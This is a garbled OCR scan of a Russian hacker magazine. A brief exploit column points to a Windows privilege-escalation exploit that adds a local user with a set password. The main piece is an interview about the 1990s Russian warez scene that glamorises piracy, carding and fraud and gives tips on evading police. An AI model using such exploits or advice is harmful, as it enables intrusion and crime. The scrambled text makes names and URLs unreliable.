[ссылки] Эксплойт для СЗВЗЗ.ЕХЕ можно ска- 
чать по адресу ѵѵѵѵѵѵ.зесигіІу.ппоѵ.гиЛіІез/М305- 
018-СЗВЗЗ.с. Подробный отчет об ошибке нахо- 
дится тут — ШрУ/зесигіІулпоѵіМоситеп1309.ІіІтІ. 

[злоключение] Ввиду особенностей архи- 
тектуры систем, эксплойт работает только на 
ѴѴіп2к и ѴѴіпХР+ЗРІ. Но именно на этих систе- 
мах обычно и нужно намутить локальные пра- 
ва. Это и делает сплоит — добавляет пользо- 
вателя е с паролем азб#321. 

[дгееіз] Автором эксплойта являются мембе- 
ры команды ЮЕРЕЫЗЕ. Эта команда не нужда- 
ется в рекламе, поэтому просто поблагодарим 
Дэвида Фритза за хороший эксплойт :). 




взлом 081 ] 





ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 






082 

Хакерский 
лайфстайл 90-х 



Я УЖЕ ДАВНО ХОТЕЛ РАССКАЗАТЬ О ТОМ, 
КАК ПОЯВИЛАСЬ И РАЗВИВАЛАСЬ РУССКАЯ 
ХАК-СЦЕНА, КТО БЫЛИ ПЕРВЫЕ ХАКЕРЫ, 

И ЧТО СОБОЙ ПРЕДСТАВЛЯЛА РАННЯЯ ТУ- 
СОВКА. НО ИНФОРМАЦИИ ОБ ЭТОМ В СЕТИ 
НЕТ ВООБЩЕ, А ТЕ ИЗ «СТАРИЧКОВ», КОТО- 
РЫХ МНЕ УДАВАЛОСЬ ОТЫСКАТЬ, ОГРАНИ- 
ЧИВАЛИСЬ ОБЩИМИ ОТВЕТАМИ В ДУХЕ: 
«ТЕПЕРЬ УЖЕ НЕ ТЕ ВРЕМЕНА...». ГЕРОЙ МО- 
ЕГО СЕГОДНЯШНЕГО ИНТЕРВЬЮ НАШЕЛ МЕ- 
НЯ САМ. ОСТАВИВ В МЫЛЕ ОТЗЫВ ОБ ИСТО- 
РИИ ОВІЫК ОВ 0\Е, ОН ПРЕДСТАВИЛСЯ ОД- 
НИМ ИЗ ПЕРВЫХ ЛЮДЕЙ, КОТОРЫЕ СОСТАВ- 
ЛЯЛИ РУССКИЙ КОМПЬЮТЕРНЫЙ АНДЕГРА- 
УНД НАЧАЛА 90-Х, ОСНОВАТЕЛЕМ ГРУППЫ 
ЗСЮОМ. А ПОД КОНЕЦ ВЫРАЗИЛ СОЖАЛЕ- 
НИЕ, ЧТО В СТАТЬЕ ОТСУТСТВУЕТ ОПИСА- 
НИЕ ЛАЙФСТАЙЛА РАННИХ ХАКЕРОВ, ДЕТА- 
ЛЕЙ, СОСТАВЛЯВШИХ АТМОСФЕРУ ТОЙ ТУ- 
СОВКИ. «РАССКАЖИ МНЕ ОБ ЭТОМ», — 
ПОПРОСИЛ Я. ТАК НАЧАЛОСЬ НАШЕ ИН- 
ТЕРВЬЮ I тіпсІѵѵОгк (тіпсІѵѵОгк@датеІапсІ.ги) 



2ШТ 



Интервью с пионером 
русской хак-сцены 

тіпсІѵѵОгк: По традиции, представься. Имя, воз- 
раст, какой внутренне и внешне. Про ранее 
детство не нужно, начни с того момента, как 
впервые наткнулся на компьютеры, и каким обра- 
зом у тебя сформировалась к ним любовь? 

5Т: Зовут Кирилл. В тусовке сначала звали ТОК, 
потом иностранцы стали называть Заіпі 
Ток (так как родом из Санкт-Петербурга), посте- 
пенно это приклеилось. Возраст от 25 до 35 и 
внутренне и, наверное, внешне. Наткнулся на 
первое свое железо в 92-м году на новом тогда 
рынке Юнона, что на юго-западе Питера. Все это 
были ранние модели 7Х. Постепенно перешел на 



«заряженную» 386 6x2 33, 4 МЬ гат, 120 МЬ І-ЮО, ЗѴОА 15". Неплохая ма- 
шина по тем временам. В 1 994 я некоторое время пожил в США (Калифор- 
ния) — там как раз начал развиваться Интернет, и мне удалось с ним поз- 
накомиться, как говорится, из первых рук. Потом вернулся на Родину, прих- 
ватив с собой какой-то брендовый комп, который у меня часто использо- 
вался как бэкап-машина. К компьютерам была не столько любовь, сколько 
сильная привязанность, которой впоследствии научился управлять. Пос- 
ледние 3 года сидел на диете, с компьютером общался только на работе. 
Правда, сейчас пришлось снова взять в руки ноутбук (+дргз — очень удоб- 
но), вследствие чего засиживаюсь за компьютером дольше чем следует. 

тіпсІѵѵОгк: Как зарождался компьютерный андеграунд в России? Где 
приобретали компьютеры, откуда брали литературу, как общались в то 
время, когда еще не было Сети? 

5Т: Зарождался как-то с трудом. В принципе, мы были просто в теме. 
Получилось так, что, приехав из США, у меня оказалась самая свежая 






информация о развитии в мире (я 
одним из первых стал пользовать- 
ся ігс, Йр, ѵѵѵѵѵѵ, Іеіпеі) и софт, кото- 
рый у нас появился бы только че- 
рез полгода. Новые знакомые, ко- 
торые тогда занимались софтом в 
расчете на перепродажу, были 
удивлены моим появлением, но я с 
ними быстро нашел общий язык. 
Примерно еще через полгода поз- 
накомился с ОегѵізИ'ем, 2отЬіе, 
Ехріог'от и еще тучей народа из 
Москвы. Вся тусовка, которую гор- 
до именовали «сцена», обитала в 
Питере и Москве. 30 человек — 
ядро, и еще сотня тех, кому было 
просто «прикольно». Половина из последних не знала, что такое варез и 
от куда он появляется. Впервые все вместе мы собрались в 95-м и 96-м гг. 
на ЕпІідПІ — небольшой пати, которая проходила сначала в центре Пи- 
тера, рядом с Гороховой, а потом на ЮЗе, в Корабелке. 

Компьютеры как сейчас, так и тогда покупали в магазинах, у всех были 
свои движения. Литературы как таковой не было, книги которые выходили, 
вызывали улыбку. В основном каждый сам что-то где-то узнавал, делился с 
другими — это и было на самом деле та основа, на которой все держалось. 
Нам все это было интересно. К тому же каждый день все менялось, будь то 
бесплатный доступ в Интернет через сотризегѵе и аоі, который прекрасно ра- 
ботал в 1 993 году, но уже через год интернет доступен был через саіііпд сагсіз, 
в которых со временем изменили алгоритм и выпустили новое обновление. До 
1 997 году Интернет представлял собой место, где люди на скорости 1 0 Мбит 
были в большой «уважухе», так как через них можно было много слить и за- 
лить. Вообще надо сказать большое спасибо нашим университетам. 100% 
ночного трафика, гуляющего в то время в Виппеі и других студенческих сетях, 
имели прямое отношение к пиратству, сцене и хакингу. Откуда еще можно бы- 
ло взять доступ в Интернет? Провайдерами за деньги мы не пользовались, так 
как это было утопично. В день на модеме я находился минимум 8 часов, час- 
то 10 — 13 — это ІВС, РТР, ТеІпеТ Если оплачивать диалап, то выходило дол- 
ларов 400 — 500, безлимитные варианты — около 1200. Поэтому провайдеров 
«крышевапи» по-своему. За то чтобы мы их не ломали, предоставляли све- 
жий софт, следили за тем, чтобы никто другой их не ломал. 

тіпсІѵѵОгк: Насколько я знаю, сцена разделялась на разные тусовки, 
где каждый занимался своим делом. Например, были варез-сцена, крэк- 
сцена, утил-сцена. Перечисли все классификации, которые были, и рас- 
скажи вкратце о каждом из этих сообществ. 

5Т: ШіІ зсепе входила в ѵѵагег зсепе. В принципе, ѵѵаг ет. была основной — 
все остальное либо имело к ней непосредственное отношение, либо кос- 
венное. Все, что не РС (IX, Соттсіоге и др.) шло параллельно, но мы всег- 




ѵѵеЬ-геІеазез. Большим уважением они не пользовались, так как мозгов для 
этой операции нужно минимум, но с каждым днем их становилось все боль- 
ше и больше, и такие проблемы, как достать, обойти защиту, протестиро- 
вать, распространить, ушли в прошлое. Вместе с ощущением фана. Вооб- 
ще, чем дальше, тем сильнее все походило на рутину, которую дети до 15 
лет очень хорошо поддерживали. Так как обладали свободным временем и 
необходимостью кому-то что-то доказать. Игровые группы специализиро- 
вались только на играх и на всем, что с этим связано. Но с появлением игр 
на 2 или 5 дисках, все стали всерьез задумываться, что с этим делать. При- 
нялись «рипать», то есть вырезать анимацию, музыку, ужимать все в мень- 
ший объем. Но тогда встал другой вопрос: кому это надо в таком виде. 



тіпсІѵѵОгк: Какие российские команды в начале/середине 90-х относи- 
ли к той самой элите? Будь то хак-сцена, крэк-, варез- или утил-. Вкрат- 
це о каждой из этих команд. 

5Т: Как таковых, российских элитных команд не было. То есть нельзя же 
назвать группу российской, если в ней только 5% людей из Москвы или 
Питера? Да и смысла что-то русское делать не было — 1 С представляла 
собой жалкое подобие софта, без какой-либо защиты, и ломать это нико- 
му не надо было. Внутри нашей страны не было как такового рынка ПО, 
если кого-то это интересовало, он сразу находил общие интересы и кон- 
такты в Европе и США. Из сгаск-групп были какие-то команды, 2 — 3 чело- 
века, которым отдавали для взлома релизы, но название уже не вспомню 
(10 лет назад было, все же). Из ѴѴагег Огіпк ог Оіе (Москва), из ийіз опіу — 
Зосіот (питерский ответ москвичам). Игровых команд не было, так как 
парни из Вагог, СІазз и 
других европейских или 
американских групп, 
доставали свежак на 
порядок быстрее, и тя- 
гаться с ними было 
нереально. Хотя 50% 
ломали ребята из Рос- 




Наскегс сіеіасе 
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сии — это был наш конек. У иност- 
ранцев хватало мозгов все аккурат- 
но упаковать по архивам, у нас — 
взломать и распространить снача- 
ла по бордам, потом по крупней- 
шим сайтам, где все обменивались 
варезом и стремились оказаться в 
первой десятке курьер-групп. К 
концу 1 995 года доски практически 
себя изжили — намного проще бы- 
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да были в отличных отношениях с этими ребятами. Ргаиб в том виде, в ко- 
тором он сегодня есть, стал набирать обороты в 96-м году, когда многим 
стало понятно, что на том же кардинге можно поднять в 100 раз больше де- 
нег, чем на варезе. Таким образом, во многих командах появились люди, 
отвечающие за наличие свежих кредитных карт, свежего железа в подарок 
самым лояльным мемберам и так далее. А ближе к 98 — 99 годам, когда 
объемы релизов стали превышать 100 Мб и появилось понятие ІЗО, варез- 
ные группы стали пропадать десятками каждую неделю, уходя во фрауд 
или со сцены вообще. На ѵѵагег зсепе значительное место занимали курь- 
ерные группы (соигіег дгоирз) — ребята соревновались, кто быстрее и боль- 
ше закачает релизов на тот или иной сайт. Количество таких сайтов не пре- 
вышало десятка — это было ядро мирового ѵѵагелсообщества, через кото- 
рое софт расходился по всему миру. Шз дгоирз поставляли любые прог- 
раммы, кроме игр. Эти релизы составляли до 70% всего трафика. С появ- 
лением онлайновых магазинов софта, многие покупали там регистрацию, 
компоновали и выпускали в Сеть в виде релизов. Мы стали называть это 



ло поставить «процесс» в юниксе, слить все через фтп на какой-нибудь 
сервер, а потом прийти туда с винтом и слить 40 МЬ за раз! В то время как 
на скорости 2400 (обычная для того времени, так как модемы на 14400 
могли себе позволить немногие), 1 .44 Мб качались час, при условии, что- 
бы не рвалась линия, и телефон не был занят. В общем, все потихоньку 
перебрались в инет. С досками мы как раз и потеряли атмосферу, кото- 
рую создавали сисопы — ведь каждая ВВЗ была оформлена в своем сти- 
ле, содержала уникальный логотип, нарисованный самим сисопом или ка- 
кой-нибуть командой. Ты как бы попадал в клуб со своими интерьерами и 
тусовкой. На сайтах все в основном было одинаково. Там практически 
никто не общался — для это есть ІВС, и чем дальше, тем больше они 
превращались в Іііе-зегѵег. Когда в 1 997 году кто-то из Валэг стал гово- 
рить о будущем сцены, и о том, что ей угрожает ФБР, я ему ответил, что 
сцена вымрет не из-за федералов, а из-за Интернета, который слишком 
доступен, и где ты можешь быть 12-летним пацаном, выдающим себя за 
кого угодно. Сцена изначально была неким вызовом — ты так или иначе 
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нарушал закон, и реально рисковал. Поставить бутылку сторожу какого- 
то завода, воткнуть на 8 часов его телефонную линию в комп, связаться 
с Англией по тарифу 2$/минута, после чего в конце месяца сделать ком- 
пиляцию софта и продать это на касете АРВИД (специальная система 
хранения данных на видеокасетах — вмещалось 2 Гб и более, что для то- 
го времени было фантастикой) или ранних СО-В пиратам... И уже через 
месяц по всей стране гуляли сборники софта тиражами по 100 тысяч. 

тіпсІѵѵОгк: Расскажи о самых незаурядных/известных личностях русско- 
го андеграунда тех времен. О своего рода легендах. Что это были за лю- 
ди, чем они занимались, какими запомнились тем, кто их хорошо знал? 
5Т: Из тех, чьи имена у меня вызывают улыбку: Метео (Питер), Ехріозіѵе 
ака Ехріог (Москва), ІпТегпаІ Наше ака РІатез (Москва), ЫеІВиппег ака 
ѴѴПйе Тудег (Питер), МасІІу Зрасег (Питер). Их реально много, всех не пере- 
числишь, и я надеюсь, никто из тех, кого я не назвал, на меня не в обиде. 
теІеО был забавным парнем, запомнился мне тем, что, наверное, первым 
попал на ТВ (то ли 95-й, то ли 96-й год). Наш питерский канал сделал спе- 
циальный выпуск, посвященный незаконному обороту ПО, и Метео высту- 
пал в открытую как крэкер. В течение года после этого, он стал считаться 
лучшим крэкером в Питере, после чего стал уходить все глубже и глубже 
вниз, от публичности, так как его стало заносить в сторону фрауда. 
Ехріозіѵе — суперчеловек. Я никогда не использовал слово «элита», но 
Ехріог пережил всех, и это про него. Он в теме с 1 995 года, перекачал 
больше всех курьеров России вместе взятых. Он самый известный курь- 
ер за рубежом, визитная карточка России на крупнейших сайтах. Я не 
могу ничего больше о нем рассказать, так как это может ему повредить. 
Но когда он выйдет на пенсию, весь эксклюзив с его согласия — ваш. 
ІпТегпаІ Наше — лучший АЗСІІ/АЫЗІ художник России, который впоследствии 
ушел в анимацию и другие направления дизайна. Но до 99-го года никто у нас 
не мог с ним сравниться — его графика была в лучших паках того времени, 
он был частью ведущих мировых сііг-групп того времени. .ЫРО, . 0 \ 7 . файлы, а 
также электронные журналы, часто использовали его графику. 

ІМеІВиппег — питерская легенда. В то время, когда средний возраст ред- 
ко превышал 20 — 23 года, ему было 28. У него были абсолютно белые 
волосы и брови. Поэтому он потом взял достаточно нелепый ник ѴѴНіТе 
Тудег. Этот человек был из разряда тех «сумасшедших», кто мог гово- 
рить о варезе часами. Был звездой любой ВЦ тусовки, выкрикивая гром- 
че всех непонятные для простых людей фразы типа: «закурьерим 12-ти 
дисковый релиз ВІЗСи, а потом нормально распилим все и сольем». В 
1997 г. уехал в Канаду за мифическим счастьем системного админист- 
ратора, и больше не радовал сцену своим присутствием. 

МасІІу Зрасег. В 1989 в Питере, впервые в России, мужчина по фамилии Во- 
долеев, стал продавать компьютерные игры за деньги. Причем, как нетруд- 
но понять, игры были откровенно ѵѵагег’ными. Дела у него шли неплохо, так 
как стали подтягиваться ребята из Москвы и регионов, открыли свою точ- 
ку, и, по сути, торговали ведь воздухом. Одна игра стоила, если мне не из- 
меняет память, минимум 10$ — это были большие деньги. Так вот, энергич- 
ный молодой человек Зрасег, ловко умудрялся воровать у самого Водоле- 
ева и выкладывать свежак у себя на ВВЗ, для узкого круга людей. Как го- 
ворится, почти задаром. Что нам стоило пива налить такому парню? Саша 
(так его звали) первым сошелся на этой теме с Мишей (б-батег) в начале 
1994, а потом Питер уже стал регулярно ездить в Москву, и наоборот. 

тіпсІѵѵОгк: Где общались хакеры и крэкеры того времени? Какие были 
первые андеграундовые русские ВВЗ? Центровые хакерские каналы в 
ІВС и форумы в Сети? Популярные темы для разговоров? 

5Т: Названия уже не помню. Было 2 — 3 борды в Москве, которые регу- 
лярно переезжали, так как на одном месте держать линию 24 часа в сут- 
ки не всегда было возможно. Среди них были даже 2-линейные. В Пите- 
ре — 2 доски, обе круглосуточные, доступ только для своих, или за день- 
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ги (15$ — неограниченное количество Мб на скачку). Общались на дос- 
ках в самом начале, потом все переползли на ІВС. Многие там до сих 
пор сидят, по инерции, хотя новое поколение по уши в теззепдег'ах. 
Часто народ пересекался на глобальных рэйвах 95 — 97 годов. Питер и 
Москва в этом плане по традиции были лидерами. В Москве отдавали 
предпочтение вечеринкам под «Птючем», в Питере — таким местам, как 
«Планетарий», «Восточные удары», а также частным вечеринкам в ку- 
рортном районе. ІпеЦ сігидз & гаѵе увлекал 80% сценеров, остальные от- 
давали предпочтение или пиву, или другим стилям в музыке. Так как это 
все стоило денег (один поход обходился минимум в $100 за ночь — бе- 
зумие для 1996 года), все использовали свои навыки с целью эти день- 
ги заработать. Так в России сцена из пиратской, стала превращаться в 
«159.1-3 УК РФ». Мошенничество (кардинг, фрикинг), нелегальный дос- 
туп к сетям (Левин, дело о Ситибанке, Гофман, дело о «Русском креди- 
те»), много дел менее громких о взломах провайдеров детьми, которых 
ловили те, кто ломал этих же провайдеров несколькими годами ранее, 
становление рынка компьютерной порнографии — самом денежном на 
сегодня сегменте «нелегальной» экономики Интернета. Поначалу никто 
серьезно к этому не относился, но когда один за другим люди стали за- 














крут, платил за тех, кто «в уважухе» — все, как в животном мире. Обыч- 
но было от 15 до 40 человек. Как я уже говорил, часто встречались на 
вечеринках, рэйвах. Многие из тех, кто стояли у истоков, были, как это 
сейчас принято говорить, «гламурными» персонажами. Это то же самое, 
если сегодня чувак, которому 19 лет, будет на мировом уровне разби- 
раться в нанотехнологиях и иметь с этого доход в особо крупных разме- 
рах. Многие чувствовали себя уверенно, и образ жизни был соответ- 
ствующий. Можно было ходить в рваных джинсах, но у тебя было самое 
дорогое железо в городе, самые свежие музыкальные диски, прислан- 
ные друзьями из Европы, с самой модной музыкой, и ты был в курсе 
всего того, о чем компьютерные журналы того времени напишут только 
через полгода. Не говоря уже о том, что вопрос с деньгами можно было 
при желании всегда решить: если кому-то из мира бизнеса вдруг пона- 
добилась программа, стоившая, к примеру, 6000$, он мог достать ее в 
течение суток у хакеров и отдать им за нее 1000$. 

тіпсІѵѵОгк: Чем была притягательна ранняя сцена? Что вы больше 
всего в ней ценили? 

5Т: Притягательна — новизной, уникальностью, эксклюзивом происхо- 
дящего. Это сейчас истории, где хакер едет в метро, рассказывая прия- 
телю: «Мама умерла, новые мозги оказались ни при чем», а люди кру- 
гом выражают сочувствие, стали анекдотом. Тогда это было реально, и 
мы все через это прошли. Ценили больше всего новости, новое, свежее 
— то, о чем будут говорить через какое-то время. Хотя, опять же, все 
индивидуально. Но самым интересным, конечно, было общение. 
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даваться вопросом, где взять много денег и 
сразу, стали появляться и планы, и проблемы. 

А Іип сменился стремлением нажиться. 

Центровых каналов в I ВС не было. Были популяр- 
ные закрытые каналы, где сидели люди из той 
или иной группы. Все ходили друг к другу в гости, 
проявляли свое уважение, общались в свое удо- 
вольствие. Появление форумов и ІСО было 
встречено всеми очень спокойно, так как это — 
одна из форм изеаЬіІіІу. Это привлекло тонны де- 
тей, которые после школы стали залезать в Ин- 
тернет и требовать к себе уважения, еще не по- 
нимая, откуда оно берется. Несмотря на рост по- 
пулярности ЭАІ_пеІ в 1997 году, ЕРпеі оставался 
(для некоторых — остается) для многих «старич- 
ков» единственным местом общения в Сети. 

Самой популярной темой для разговоров всегда была сама жизнь: от 
баб до космоса. Конкретных тем не было, фан заключался в том, что мы 
стали первыми в мире, кто использовал преимущества Интернета для 
общения. Когда принцесса Диана разбилась, это произошло ночью, на 
канале были люди отовсюду. И один из них жил в квартале от происше- 
ствия. Он сходил, посмотрел и, вернувшись, стал рассказывать нам 
свои впечатления. А весь мир начал это обсуждать только через 8 ча- 
сов, просмотрев выпуски новостей. Мы говорили об этом всю ночь, спо- 
рили о том, кто виноват, и что теперь будет. Не было ни уапбех, ни 
Іепіа.ги, об этом нигде нельзя было прочитать. И ты чувствовал себя 
частью истории. И так было с войной в Чечне, и с Югославией и многи- 
ми другими событиями. Мы узнавали друг от друга новости из разных 
уголков мира, обменивались житейским опытом, обсуждали какие жен- 
щины лучше, дышали этим общением. Это заменяло улицы России, ко- 
торые в 95-м году были менее приветливыми, чем сегодня. 

тіпсІѵѵОгк: Как часто проводились риаллайфовые встречи мемберов 
хак-групп? Как проходили такие встречи, сколько людей собирали, ка- 
кие тусовки оказались наиболее памятными. 

5Т: Масштабные ВІ_-встречи проводить не было нужды — все и так об- 
щались. Если говорить о международном уровне — обычно двое-трое 
наших ребят уезжали в Европу, там предварительно собирались люди 
из нескольких стран. Запомнилась встреча в Стокгольме в 1995 году и 
в Германии в 1997 году. Было весело. Собирались все, у кого были 
деньги приехать. Абсолютно не важно, крут ты или нет. Часто, если не 




тіпсІѵѵОгк: Какие сайты, посвященные компьютерной безопасности, 
были первыми в рунете? И какие стали популярными среди хакеров? 
5Т: Сайты по компьютерной безопасности, что сейчас, что тогда — для 
всех. Собственно, если только их читать, то и будешь как все. А ни я, ни 
кто-либо из нашей команды как все быть не хотели. Лучший хакер, най- 
дя ноу-хау, будет его выжимать до конца, или обмениваться опытом с 
такими же. И последнее, что он будет делать — 
помогать кому-то, хоть одним уровнем ниже. 
Поэтому все, что открыто — это больше для ад- 
минов, для обмена опытом, чтобы дать им воз- 
можность обсудить тонкости зесигііу. Все хаке- 
ры, которых я знал, и кто мог себя причислить 
к разряду лучших, были волками-одиночками. 
Внешне, правда, редко напоминая волков. 
Каждый — уникален и неповторим, в связи с 
чем, лучшими и становились. Среди хакеров ни 
один сайт никогда не будет популярен. Он 
просто недостоин этого, по их мнению. 

тіпсІѵѵОгк: Волками не выглядели, а как именно? 
5Т: Людей со сцены редко принимали за 
компьютерщиков. В этом был шик. Выглядеть 
так, чтобы никто не мог предположить, что ты 
имеешь что-то общее с компьютерами. Это как 
выехать за рубеж в начале 90-х и производить 
впечатление американца или немца тем, что 
ты прекрасно говоришь без акцента на английском и выглядишь как ев- 
ропеец. Если вы видите сборище людей, у которых на груди висит сго- 
ревший ДИММ, а на спине рюкзак с процем, то это мимо кассы. 

тіпсІѵѵОгк: Программные предпочтения компьютерщиков того време- 
ни... на каких ОС работали, чем серфили Сеть, в какие игрушки играли, 
какие проги считались тизі Наѵе в коллекции? 

5Т: 003 от 3.0 до 7.00 с обязательным переходом через 6.22. ѴѴіпбоѵѵз 
95 — мы месяц не могли поверить, что под виндами можно одновремен- 
но скачивать что-то, играть и подбирать пароли по словарю. Хотя в пер- 
вых версиях работа с модемом не отличалась высоким качеством (при 
переключении окон, связь могла сорваться или срз падал), все равно 
это была революция. 95-й винде прощалось все, так как она дала воз- 
можность делать многие вещи одновременно. 03/2 была популярна так 
же, как сегодня Масіпіозіі. Ну а до этого — ѴѴіпбоѵѵз 3.1 и 3.1 1 Іог ѵѵогк- 
дгоирз, АОІ_, Сотризегѵе или І_осаІ ІЗР с ѴѴіпзоскеІ. Но это был эксклю- 
зив, об этом в 1994 даже поговорить было не с кем. Среди игр каждый 
год появлялся новый хит, но многих сплотил, конечно, ЭООМ. Мизі 
Паѵе'ные программы для 1994 года: ЭОЗ 5.0, ѴѴіпЗ.11, ТегтіпаІ, Ркипгір, 
Ркгір, Аф Ѵс, аісізіезі, ІМогІоп ІЛіІіііез, І_ехісоп. Все остальное — по жела- 
нию, в индивидуальном порядке. Но этого списка вполне хватало, чтобы 
выполнить 95% системных задач. Многое шло в комплекте с 003-ом: 
папки с софтом для игр, программирования, музыки (если у кого-то был 
СОѴОХ или Зоипб Віазіег — редкая тогда роскошь). Термин «хакер» ис- 
пользовался крайне редко, так как ломать попросту было нечего. 
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тіпсІѵѵОгк: Какое место на мировой сцене занимала Россия? Были ли 
русские команды хорошо известны, или мы всегда оставались в тени за- 
пада? Какие проекты и достижения русских хакеров/крэкеров стали из- 
вестны за пределами СНГ? 

5Т: Никакое. Софт из России достиг мировой планки только после 97- 
го года (ТНе Ваі, Ваг), до этого мы только потребляли. Похвастаться осо- 
бо было нечем. Чисто русские команды известны не были, но некоторые 
группы, основанные русскими или при участии русских, получили изве- 
стность. Та же Огіпк ог Оіе. Хотя практически в каждой топовой хак/крэк 
теме состоял хоть один мембер из России, либо родившийся там. 

тіпсІѵѵОгк: Какие были самые значительные для сцены события на 
протяжении 90-х гг.? И как они повлияли на сцену? 

5Т: Думаю, не ошибусь, если выделю такие этапы: 

-отмирание старой школы (доски, модемы на 2400, софт до 1 Мб); 
-развитие интернета (убил, как говорят европейцы, «чувство сцены»); 
-развитие Ігаиб зсепе на базе Интернет (акценты сместились); 

Все остальное: аресты, тусовки и так далее — было вторично. В конце 
90-х эпоха закончилась, и люди из новой волны, с ІСО и своим видени- 
ем сцены, стали все перестраивать под себя. Мне кажется, это нормаль- 
но. Естественный ход эволюции. 

тіпсІѵѵОгк: Какие страны в 90-х считались самыми продвинутыми в плане ха- 
кинга, крэкинга и андеграунда? Отличалась ли чем-то сцена в разных странах? 
5Т: Россия и Украина зажигали по полной. Можно было делать все, что 
угодно, так как не было никакой законодательной базы. Нашей свободе за- 
видовали все. В России не было ограничений, как у ребят в Европе и Шта- 
тах. Дальше — шведы (ВеЬеІз — одна из сильнейших команд), потом — 
французы, немцы и бельгийцы. Они все в тусовке, всегда вместе, регуляр- 
но приезжали друг к другу. Правда, французы и бельгийцы всегда откро- 
венно издевались над немцами за то, что те слишком тормозные и серьез- 
ные. Но в целом, дружили. Большая активность была в США. Вообще, бы- 
ло две сцены — европейская и штатовская. Так как из-за разницы во вре- 
мени, в штатах вставали тогда, когда у нас все ложились спать, европейцы 
нередко засиживались до утра, чтобы решить какие-то вопросы с амери- 
канцами. Сцена в каждой стране отличалась традициями и национальными 
особенностями, но примеров привести не могу — просто не помню. 

тіпсІѵѵОгк: В начале 90-х гг. в США несколько лет велась электронная 
война между хакерскими группами І_едіоп оі Боот и Мазіегз оі Оесерйоп. 
Были ли подобные столкновения между русскими хакерами и крэкерами? 
5Т: Да нет, крэкеры всегда старались держаться особняком, понимая, 
что если кто-то серьезно и нарушает законы об интеллектуальной 
собственности, так это — они. Те, кто реально нарушал закон, не высо- 
вывались — понимали, что за это можно получить статью, или что еще 

хуже, стрелу, после которой ты 
окажешься где-нибудь в лесу или 
подвале. К Мише Лтту Латет., ге- 
рою недавно опубликованной у 
вас статьи о Огіпк ог 0\е, отноше- 
ние было неоднозначное. Те, кто 
хорошо его знали, редко водили с 
ним дружбу более года — он себя 
вел всегда вызывающе, часто с 
лишними на тот момент понтами. 
Если бы он не уехал, то серьезный 



конфликт был бы наверняка. На мировой сцене нас всегда 
уважали и боялись, так как подрастающему поколению 
парни из России внушали животный страх рассказами о 
пушках, водке, мрачных улицах и других вещах. Поэтому 
там даже намека не было на какие-то трения. А внутри 
страны — так, по мелочам. Молодые были. 

тіпсІѵѵОгк: Расскажи о группе Зосіот. Как она появилась, 
как развивалась, чем вы занимались, немного о мемберах, 
когда был самый пик активности и когда произошел спад, 
над какими проектами работали, и чем закончилась исто- 
рия команды? 

5Т: Группа Зосіот появилась в 1995 году. 80% первона- 
чального состава составлял Питер, 20% — Москва. Полго- 
да спустя половина людей были уже из Европы, к концу 
пришли мемберы из США, Австралии, Канады. В группе 
было около 50 — 60 человек, из России были крэкеры и те, 
кто занимался организацией. О 
мемберах говорить не буду — это 
отдельная тема разговора. Скажу 
только о тех, о ком остались осо- 
бенно хорошие воспоминания: 
Каіг — США, 39 лет, женщина, ко- 
торая внесла домашнюю атмос- 
феру; ІРдді — Австралия, чело- 
век, запустивший электронный 
журнал беіасіо, где освещалось 
все, что происходило на мировой сцене; Зепзі — Франция, парень, ко- 
торый всех подпитывал треками регги-музыки и который следил за 
поставщиками релизов; *іас\ іп ІПе Вох — Россия, человек, который под- 
держивал общение со всеми звездами мировой сцены и который был 
душой канала Зосіот; Оіггісіепі & ѴѴахаМаск — Германия, лидеры самой 
успешной европейской курьер-группы того времени Оеѵоііоп, они сле- 
дили за тем, чтобы у нашей команды были лучшие сайты в качестве 
«дропов», и чтобы релизы распространялись быстро и без косяков. Пик 
активности пришелся на 1997 год — тогда нас очень уважали за каче- 
ство и количество релизов, а лозунгом была фраза: Виззіап Маііа — 
ѵѵе'ІІ Іаке саге оі уои. Закрылись в 1998 году, после изменения вектора 
личной жизни у лидеров команды. Основным нашим проектом была 
группа и все, что с ней было связанно. История Зосіот закончилась 
торжественной финальной встречей в Интернете. 

тіпсІѵѵОгк: Насколько активно наша доблестная милиция занималась 
компьютерными делами? Ловили ли «крупную рыбу» или перебивались 
мелкой рыбешкой? Существовала ли вообще угроза для серьезных людей, 
которые на взломе и кардинге делали большие деньги, попасть за решетку? 
5Т: Наша доблестная милиция была настолько же активна, насколько хо- 
рошо оснащена компьютерами и насколько хорошо разбиралась в тон- 
костях Іср/ір. То есть — никак. Доблестной милиции, в принципе, было 
глубоко наплевать, как создали отдел «Р», который через пол года ска- 
тился к банальной прослушке за деньги. «Крупную рыбу» никогда не ло- 
вили и не поймают, так как «крупной рыбе» в России делать нечего. С 
точки зрения дел. С точки зрения проживания — да, «крупная рыба» и у 
нас, и на Украине водится. Но нет смысла делать что-либо тут. Банковс- 
кая система в США и Европе на 50 лет старше нашей, и вариантов для те- 
лодвижений там, конечно, больше. За решетку люди попадали и у нас, и 
там, но базу всегда под это подводили другую, брали всегда на другом. 
Чаще всего люди попадались на случайностях, вещах, не имеющих ниче- 
го общего с кардингом, а веером заносило все и всех. И в результате нак- 
рывало еще больше. Так как доказать фрауд сложно, многие, кто попал- 
ся, сидели срок за другие преступления. В нашей стране, при количестве 
специалистов в органах, которых можно пересчитать по пальцам, не гро- 
зит вообще ничего. Например, сетевая порнография в нашей стране 
процветает спокойно, хотя уровень публичности там гораздо выше, и ба- 
зу подвести легче. Говоря «не грозит ничего», я говорю о людях, которые 
живут этим, и знают все подводные камни, которые следует избегать. «Не 
срать, где живешь», то есть не трогать российский Интернет и компании 
с русским капиталом, всегда всю информацию держать в максимально 
зашифрованном виде, регулярно менять оборудование и так далее. 

тіпсІѵѵОгк: Насколько сильно изменилась сцена за 10 лет? Какие 
главные отличия новой тусовки от старой? 

5Т: Я ушел в 98-м году и мне сложно судить, что произошло в 
последующие 7 лет. Могу предположить, что главные отличия в ценностях, 
которые исповедуют люди, занимавшиеся этим тогда и сейчас. Произошло 
бурное омоложение, с 17-22 лет, составлявших раньше средний возраст 
начинающих, до 9-13 лет. Что не пошло на пользу, на мой взгляд © 









ЮНИТЫ КРЕАТИФФ КОДИНГ ІІМХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 







Свежую информацию и 
разные хакерские новости 
ты всегда сможешь найти 
на хакер. ш 
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некоторые дефейсы из 
статьи ты найдешь на 
нашем диске. 
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Есть ли панацея 
